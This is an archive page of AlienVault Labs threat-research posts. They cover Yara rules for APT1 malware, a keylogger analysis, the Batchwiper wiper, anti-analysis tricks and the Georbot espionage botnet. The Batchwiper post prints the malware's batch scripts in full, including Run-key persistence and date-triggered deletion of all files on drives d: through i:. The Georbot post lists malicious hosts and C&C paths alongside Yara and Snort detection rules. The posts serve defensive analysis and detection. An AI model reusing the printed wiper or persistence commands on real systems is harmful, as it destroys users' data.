AlienVault Labs - Archive

Yara rules for APT1/Comment Crew malware arsenal

February 20th, 2013 | Posted by jaime.blasco in APT | Attacks | Forensics | Malware - (Comments Off)

I’m sure all of you have heard about Mandiant’s APT1 report published yesterday. As many of you probably know we have been tracking and exposing this group for a long time as well as other individuals and companies in the security industry. A couple of examples are:

- Win32/Coswid

- Unveiling a spearphishing campaign and possible ramifications

During the last few years we have been producing content that we have used to track and detect Comment Crew’s artifacts such as Snort rules, Yara rules and IOCs. We have decided to publish some of this content and we’ve completed our information with the great intel Mandiant published. The first package we are releasing is a set of 81 Yara rules that will help malware analysts and incident responders to detect, classify and track the malware arsenal used by Comment Crew.

Some of these rules have been built to specifically detect Comment Crew’s tools and others are more generic.

You can download the rules from here.

How can I use the rules?

The easiest way to use this content is installing Yara (http://code.google.com/p/yara-project/). Once installed you can use the cmd tool yara to detect and classify files in your dataset. Example:

$ ../yara-1.6/yara apt1-2.yara files/
APT1_WEBC2_CLOVER files//01114c2b1212524c550bbae7b2bf9750aba70c7c98e2fda13970e05768d644cf
EclipseSunCloudRAT files//021b4ce5c4d9eb45ed016fe7d87abe745ea961b712a08ea4c6b1b81d791f1eca
APT1_TARSIP_ECLIPSE files//021b4ce5c4d9eb45ed016fe7d87abe745ea961b712a08ea4c6b1b81d791f1eca
APT1_WEBC2_Y21K files//02601a267fe980aed4db8ac29336f7ecf1e06f94e9ac0714e968b64586624898
APT1_WEBC2_CSON files//02601a267fe980aed4db8ac29336f7ecf1e06f94e9ac0714e968b64586624898
APT1_b64_cnc_commands files//02601a267fe980aed4db8ac29336f7ecf1e06f94e9ac0714e968b64586624898
APT1_WEBC2_Y21K files//060764506ad9134d5900fc0cd160fc14de80682f1861a3ef084c7c91a734881f
APT1_b64_cnc_commands files//060764506ad9134d5900fc0cd160fc14de80682f1861a3ef084c7c91a734881f
STARSYPOUND_APT1 files//082323fd0f3d24f8fe31895ad1246ae2116aee78d01be83a28c3cbb856541003
APT1_SY files//082323fd0f3d24f8fe31895ad1246ae2116aee78d01be83a28c3cbb856541003
APT1_WARP files//08af44d381df5250323cf196444aa90597f8049dad55712fe45e80b1a8d8cded
APT1_points files//08af44d381df5250323cf196444aa90597f8049dad55712fe45e80b1a8d8cded
APT1_readynewcmd files//0963ba541d56b9805713aa13d955b91f6bb875318698ba6119d5944d68c45afb
HACKSFASE2_APT1 files//0b9ca6fb32fcde1e6e55e8874982a2a921e73c6ebdf7246177fecf63542a4a83
ccrewSSLBack1 files//0b9ca6fb32fcde1e6e55e8874982a2a921e73c6ebdf7246177fecf63542a4a83
APT1_WEBC2_YAHOO files//0c50ddf7295d4ddfafae479e7c3ce21ca6416442c0c8c5e90aedbb3e583a8b20
APT1_uagent_iphone85 files//0c50ddf7295d4ddfafae479e7c3ce21ca6416442c0c8c5e90aedbb3e583a8b20
APT1_letusgo files//0c50ddf7295d4ddfafae479e7c3ce21ca6416442c0c8c5e90aedbb3e583a8b20
APT1_WEBC2_QBP files//0c8ad4824264dd09b3be02f462f968729bf7339438bf5fa69af9ca995353f6df
APT1_WEBC2_GREENCAT files//0e829513658a891006163ccbf24efc292e42cc291af85b957c1603733f0c99d4

On the other hand there are several projects and products that support Yara as a format. Here are some examples:

- JSUnpack

- Virustotal VTMIS

- Volatility, example of using the Yara plugin in Volatility

- Fireeye

We’ve reviewed the rules to minimize false positives but please send us your feedback and we will improve the Yara rules with that information.

Here is the complete list of Yara rules released:

LIGHTDART_APT1
AURIGA_APT1
AURIGA_driver_APT1
BANGAT_APT1
BISCUIT_GREENCAT_APT1
BOUNCER_APT1
BOUNCER_DLL_APT1
CALENDAR_APT1
COMBOS_APT1
DAIRY_APT1
GLOOXMAIL_APT1
GOGGLES_APT1
HACKSFASE1_APT1
HACKSFASE2_APT1
KURTON_APT1
LONGRUN_APT1
MACROMAIL_APT1
MANITSME_APT1
MINIASP_APT1
NEWSREELS_APT1
SEASALT_APT1
STARSYPOUND_APT1
SWORD_APT1
thequickbrow_APT1
TABMSGSQL_APT1
CCREWBACK1
TrojanCookies_CCREW
GEN_CCREW1
Elise
EclipseSunCloudRAT
MoonProject
ccrewDownloader1
ccrewDownloader2
ccrewMiniasp
ccrewSSLBack2
ccrewSSLBack3
ccrewSSLBack1
ccrewDownloader3
ccrewQAZ
metaxcd
MiniASP
DownloaderPossibleCCrew
APT1_MAPIGET
APT1_LIGHTBOLT
APT1_GETMAIL
APT1_GDOCUPLOAD
APT1_WEBC2_Y21K
APT1_WEBC2_YAHOO
APT1_WEBC2_UGX
APT1_WEBC2_TOCK
APT1_WEBC2_TABLE
APT1_WEBC2_RAVE
APT1_WEBC2_QBP
APT1_WEBC2_KT3
APT1_WEBC2_HEAD
APT1_WEBC2_GREENCAT
APT1_WEBC2_DIV
APT1_WEBC2_CSON
APT1_WEBC2_CLOVER
APT1_WEBC2_BOLID
APT1_WEBC2_ADSPACE
APT1_WEBC2_AUSOV
APT1_WARP
APT1_TARSIP_ECLIPSE
APT1_TARSIP_MOON
APT1_aspnetreport
APT1_Revird_svc
APT1_letusgo
APT1_dbg_mess
APT1_known_malicious_RARSilent

Update (02/22/2013): We have improved the ruleset, update to the latest version!

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

Set up your keylogger to report by email? Bad idea! (The case of Ardamax)

February 11th, 2013 | Posted by Alberto Ortega in Forensics | Malware | Windows - (Comments Off)

A couple of days ago, I was surfing our wild Internet when I came up with a dirty piece of software dedicated to steal accounts of a popular build-with-bricks videogame.

The program offered a premium account of the videogame for free. The real fact is that it was a stealer, which installs a keylogger on your computer to record and send your private information to the bad actors.

When the user executes the program, the keylogger silently installs itself and then hides its directories and processes. If we take a look at the installation directory, it has these files:

d6192e6ac19bedf50772769568b8a1bf RKJ.00 (encrypted configuration file)
c8602a35ed53655f62eb70e52627f7ef RKJ.01 (aux exec file)
cabd1ee6acc039dd33ba48f886f3b12d RKJ.02 (aux exec file 2)
29c88770640993a5f0df70bfa272bb09 RKJ.exe (main executable)

It looks like an Ardamax Keylogger installation, latest version. This is a pretty popular keylogger among bad guys, it has trial and paid versions. It can monitor keystrokes, login credentials, clipboard and even take screenshots and pictures from the webcam.

A couple of minutes after the infection, the machine started to connect to Google’s email server using an encrypted channel (SSL SMTP). Is the keylogger reporting results to the administrator using this? In that case, we could probably analyse the sample and get the email account credentials of the malware administrator.

As the configuration file is encrypted, the easiest way to get some more information is by doing some reverse engineering. Let’s going to infect a machine, dump the memory (keylogger.mem) and analyse it with volatility.

$ python vol.py -f keylogger.mem pslist

The keylogger process is hidden for Windows Task Manager, but volatility can show it to us.

Offset(V) Name PID PPID Thds 0x862d6528 RKJ.exe 1832 1528 1

Time to dump process memory.

$ python vol.py -f keylogger.mem memdump -p 1832 --dump-dir=/tmp/

And if we carefully study the strings contained in that memory dump (take care of the encoding!)…

$ strings -a --encoding=l 1832.dmp [...] Logs from "%USERNAME% [censored].server232@gmail.com --> username smtp.googlemail.com --> password [...]

Luckily Google had disabled the email account due to service abuse, no need to report the issue.

What about the encrypted configuration file?

We have seen some people infected by this keylogger wondering how to decrypt the file to see where is the malware leaking information to. Well, if you can not do memory analysis or some debugging it is quite easy to decrypt.

After a quick cryptanalysis of the file, it is quite obvious that it is encrypted with XOR cipher or something similar. You can easily decrypt it by using a XOR analysis tool like xortool. Let’s give a try:

$ python xortool.py -b keylogger/RKJ.00

xortool will generate some output files with possible decryptions. In this case the 33rd file was the good shot, encrypted with key “Z|NY”. If we open it with an editor, we can see all configuration parameters and reporting credentials in plain text.

Take care of the channels you allow on your network! We have seen how Google do a great job on cancelling accounts of this kind, but we should never have a blind faith on a legit connection because it could be a potential way to leak private information to the outside.

Alberto Ortega

Ardamax Keylogger, keylogger, malware, stealer, volatility

Batchwiper: Just Another Wiping Malware

December 17th, 2012 | Posted by jaime.blasco in APT | Attacks | Forensics | Malware - (Comments Off)

A few days ago, The Iranian CERT (Maher Center) released information about a new identified targeted malware with wiping capabilities. The piece of code is very simple and it deletes files on different drives on specific dates.

The original dropper is a self-extracting RAR file with the name GrooveMonitor.exe. Once executed it extracts the following files:

\WINDOWS\system32\SLEEP.EXE, md5: ea7ed6b50a9f7b31caeea372a327bd37

\WINDOWS\system32\jucheck.exe, md5: c4cd216112cbc5b8c046934843c579f6

\WINDOWS\system32\juboot.exe, md5: fa0b300e671f73b3b0f7f415ccbe9d41

The juboot.exe is executed. The following bat file is created and executed:

\Documents and Settings\%User%\Local Settings\Temp\1.tmp\juboot.bat

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d “%systemroot%\system32\jucheck.exe” /f

start “” /D”%systemroot%\system32\” “jucheck.exe”

As you can see the bat file uses reg.exe to create a registry key that the malware uses to maintain persistence executing the jucheck.exe file everytime the system boots.

Then jucheck.exe is executed that creates the file \Documents and Settings\Administrator\Local Settings\Temp\4.tmp\jucheck.bat:

@echo off & setlocal

sleep for 2
del “%systemroot%\system32\juboot.exe” /q /s /f
del “%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe” /q /s /f

if “%date%”==”Mon 12/10/2012″ goto yes
if “%date%”==”Tue 12/11/2012″ goto yes
if “%date%”==”Wed 12/12/2012″ goto yes

if “%date%”==”Mon 01/21/2013″ goto yes
if “%date%”==”Tue 01/22/2013″ goto yes
if “%date%”==”Wed 01/23/2013″ goto yes

if “%date%”==”Mon 05/06/2013″ goto yes
if “%date%”==”Tue 05/07/2013″ goto yes
if “%date%”==”Wed 05/08/2013″ goto yes

if “%date%”==”Mon 07/22/2013″ goto yes
if “%date%”==”Tue 07/23/2013″ goto yes
if “%date%”==”Wed 07/24/2013″ goto yes

if “%date%”==”Mon 11/11/2013″ goto yes
if “%date%”==”Tue 11/12/2013″ goto yes
if “%date%”==”Wed 11/13/2013″ goto yes

if “%date%”==”Mon 02/03/2014″ goto yes
if “%date%”==”Tue 02/04/2014″ goto yes
if “%date%”==”Wed 02/05/2014″ goto yes

if “%date%”==”Mon 05/05/2014″ goto yes
if “%date%”==”Tue 05/06/2014″ goto yes
if “%date%”==”Wed 05/07/2014″ goto yes

if “%date%”==”Mon 08/11/2014″ goto yes
if “%date%”==”Tue 08/12/2014″ goto yes
if “%date%”==”Wed 08/13/2014″ goto yes

if “%date%”==”Mon 02/02/2015″ goto yes
if “%date%”==”Tue 02/03/2015″ goto yes
if “%date%”==”Wed 02/04/2015″ goto yes

goto no

:yes

sleep for 3000
IF EXIST d:\ del “d:\*.*” /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del “e:\*.*” /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del “f:\*.*” /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del “g:\*.*” /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del “h:\*.*” /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del “i:\*.*” /q /s /f
IF EXIST i:\ Chkdsk i:

del “%userprofile%\Desktop\*.*” /q /s /f
\\start calc

:no

As you can see when the bat file is executed, the juboot.exe file is deleted as well as the GrooveMonitor.exe executable that resides in the Start Menu folder. Then the bat files checks the system date and if it matches one of the predefined dates it executes the wiping routine. This routine checks for system drives and it then deletes every file on those drives. Finally it deletes the userprofile folder.

We don’t have details about the infection vector but based on the dropper it could be deployed using USB drives, internal actors, SpearPhishing or probably as the second stage of a targeted intrusion.

We have built some OpenIOC indicators that you can access here.

jaime.blasco

Your malware shall not fool us with those anti analysis tricks

November 5th, 2012 | Posted by Alberto Ortega in Forensics | General | Malware - (2 Comments)

It is well known that a big amount of malware samples are aware of the execution environment. This means that a malware sample can change his behavior if it detects that the running environment is unwanted.

There are resources, public source code, and even programs that detail how to bypass automatic malware analysis systems and make things awkward for malware researchers. Of course, these resources are quite useful for both researchers and malware developers.

We are going to take a look at some of these tricks, all found in real malware samples.

Also, just as they do, we have developed some yara signatures to detect these tricks that could be useful to differently process or classify these malware samples.

We could classify anti analysis tricks in three big groups:

- Anti Virtual Machine, that tries to detect if the execution environment is a known VM or emulator.
- Anti Debugging, that tries to detect if the program is running under the surveillance of a debugger.
- Anti Sandbox, that tries to detect known sandboxing products.

It is not unusual to find all kind of tricks in just one malware sample. For example, we can take a look at the sample 9255c75de8fbc20ee67f427397e1ef82:

Quickly we can find that it is looking for sbiedll.dll (to detect Sandboxie) and dbghelp.dll

It also opens the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum with value 0 to read the ID of the hard disk in the machine:

Then it is compared with these three strings (VIRTUAL, VMWARE, VBOX):

Finally, it opens the registry key HKLM\Software\Microsoft\Windows\CurrentVersion with value ProductId:

And checks it against these three known MS Windows products ID from different commercial sandboxes:

If we take a look at another sample (36527d5954bf3b2af60e6efa6398ccff), we will discover a canonical function to check this:

It checks the MS Windows product ID and if it is “76487-644-3177037-23510″, the function will return 1. Else, it will return 0. It also has the same function prototype to check keys “55274-640-2673064-23950″ and “76487-337-8429955-22614″.

This sample also uses MS Windows system functions to detect debugging.

It loads the function handler for IsDebuggerPresent using the function GetProcAddress() from kernel32.dll. Hey wait! And why not use IsDebuggerPresent() directly? Because it is noisy and easily detectable.

If it can not load the function or the function returns 0 (debugger not present), it will return 0. Else, it will return nonzero.

It also looks for files (SyserDbgMsg / SyserBoot) and (SICE / NTICE) using this function:

This trick is to detect both SyserDebugger and SoftICE debuggers.

As we said, we have published a ruleset of yara signatures to detect AntiVM, AntiDebugger and AntiSandbox procedures in malware samples. You can grab it in our GitHub repository here.

Alberto Ortega

debugging, malware, reversing, sandbox, signatures, vm, yara

Georbot Botnet – A cyber espionage campaign against Georgian Government

A few days ago, CERT-Georgia published a great report describing a cyber spionage campaign. ESET wrote a great report a few months ago as well. The report said the malware was found in Georgian Governmental Agencies including ministries, parliament, banks, ngo’s. The report also says the purpose of the malware was “Collecting Sensitive, Confidential Information about Georgian and American Security Documents” and it establishes a connection with Russian Official Security Agencies.

In this blog post we will offer a brief about the infection vectors as well as the malware behavior and we will share some IOC’s and signatures to detect the presence of the malware in your systems.

Infection method

To compromise the victims, the attackers placed javascript code or iframes into websites leading to exploit code.

The compromised website includes Georgian Government servers like ema.gov.ge. Other examples are:

- ema.gov.ge

- 31.214.140.214

- 178.32.91.70

- georgiaonline.xp3.biz

- 31.31.75.63

- 173.212.192.83

An example of a malicious javascript is as follow:

The malicious javascript present in frame.js/frame.php includes code that exploits several vulnerabilities including CVE-2010-0842, CVE-2006-3730, MS06-057 and some Java exploits.

Examples of exploit codes found:

178.32.91.70 [/] modules[/]docs[/]newexp[.]jar https://www.virustotal.com/file/9bf88bf15ffa6888ec2a3bd9e8dc6d13b650f1122ca69cface9ccf777c32e259/analysis/

178.32.91.70 [/] modules[/]docs[/]Java-2010-0842[.]jar

https://www.virustotal.com/file/7a900cc7616cfbf2ca17350c436af2490621550ded3e29325dc31149db50c63d/analysis/

Once the exploit code is executed, the payload calc.exe that contains the malware is downloaded from the remote server.

The malware uses a custom packer to evade security security products. It also uses obfuscation to hide both the configuration values and the API calls.

The malware uses byte substraction operations to hide the strings including the configuration values:

After deobfuscation:

We can use the following Yara rule to detect the obfuscated binary:

rule GeorBotBinary
{
strings:
$a = {63 72 ?? 5F 30 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C}

condition:
all of them
}

Based on the deofuscated strings we can also write a Yara rule to detect the presence of the malware in memory:

rule GeorBotMemory
{
strings:
$a = {53 4F 46 54 57 41 52 45 5C 00 4D 69 63 72 6F 73 6F 66 74 5C 00 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 00 52 75 6E 00 55 53 42 53 45 52 56}
$b = {73 79 73 74 65 6D 33 32 5C 75 73 62 73 65 72 76 2E 65 78 65}
$c = {5C 75 73 62 73 65 72 76 2E 65 78 65}
condition:
$a and ($b or $c)
}

We use both the registry key used to maintain persistence and the executable name that the malware creates on the system (in version >=5 of the malware those values are stored on wide strings).

If we have a memory image of a system we can use Volatility to look for processes matching our Yara rule:

$ python vol.py -f /Users/jaime/tmp/geor.img yarascan -y GeorBotMemory.yara
Volatile Systems Volatility Framework 2.1_alpha

Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004055b3 53 4f 46 54 57 41 52 45 5c 00 4d 69 63 72 6f 73 SOFTWARE\.Micros
0x004055c3 6f 66 74 5c 00 57 69 6e 64 6f 77 73 5c 43 75 72 oft\.Windows\Cur
0x004055d3 72 65 6e 74 56 65 72 73 69 6f 6e 5c 00 52 75 6e rentVersion\.Run
0x004055e3 00 55 53 42 53 45 52 56 00 2e 64 6f 63 00 2e 78 .USBSERV..doc..x
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059a6 73 79 73 74 65 6d 33 32 5c 75 73 62 73 65 72 76 system32\usbserv
0x004059b6 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 53 5c .exe.C:\WINDOWS\
0x004059c6 73 79 73 74 65 6d 33 32 5c 75 73 62 63 6c 69 65 system32\usbclie
0x004059d6 6e 74 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 nt.exe.C:\WINDOW
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059ae 5c 75 73 62 73 65 72 76 2e 65 78 65 00 43 3a 5c \usbserv.exe.C:\
0x004059be 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d 33 32 WINDOWS\system32
0x004059ce 5c 75 73 62 63 6c 69 65 6e 74 2e 65 78 65 00 43 \usbclient.exe.C
0x004059de 3a 5c 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d :\WINDOWS\system

Network traffic

The malware uses HTTP to communicate with the C&C server. It contains several commands to upload and retrieve information from the victim. It also looks for malware updates every once in a while. In early versions the update version was requested from /modules/docs/upload/calc.exe on the C&C server.

In newer versions the malware performs a request to /calc.php and the server sends base64 encode content (it can be done using content from different servers at the same time).

When the malware starts it sends the following request to the C&C:

Every minute it sends the following HTTP request to the C&C to ask for instructions:

In newer versions the parameter “cam” was also introduced that tells the C&C whether the infected system has a webcam.

/index312.php?ver=5.1&cam=0&p=cert123&id=401acd00

You can use the following snort to detect the presence of this malware in your network:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET MALWARE Georbot requesting update”; flow: to_server,established; content:”/modules/docs/upload/calc.exe”; http_uri; classtype:trojan-activity; sid:1111111112; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET MALWARE Georbot initial checkin”; flow: to_server,established; content:”POST”; http_method; nocase; content:”.php?ver=”; http_uri; content:”&p=cert123″; fast_pattern; http_uri; content:”&id=”; http_uri; classtype:trojan-activity; sid:1111111113; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET MALWARE Georbot checkin”; flow: to_server,established; content:”.php?ver=”; http_uri; content:”&p=bot123″; fast_pattern; http_uri; content:”&id=”; http_uri; classtype:trojan-activity; sid:1111111114; rev:1;)

Emerging Threats Pro has coverage for previous versions (see “ETPRO TROJAN TDSS.xcn”) but the rules I posted will work with newer versions of the malware as well.

Based on the behavior of the malware we wrote this OpenIOC rule:

You can download all the content from this blog post on the following url:

https://github.com/jaimeblasco/AlienvaultLabs/tree/master/malware_analysis/Georbot

Happy Halloween!

Yara rules for APT1/Comment Crew malware arsenal

jaime.blasco

Set up your keylogger to report by email? Bad idea! (The case of Ardamax)

Alberto Ortega

Batchwiper: Just Another Wiping Malware

jaime.blasco

Your malware shall not fool us with those anti analysis tricks

Alberto Ortega

Georbot Botnet – A cyber espionage campaign against Georgian Government

jaime.blasco

Navigation

Search IP in reputation database

Labs on twitter

Tags

Recent Discussions

People Online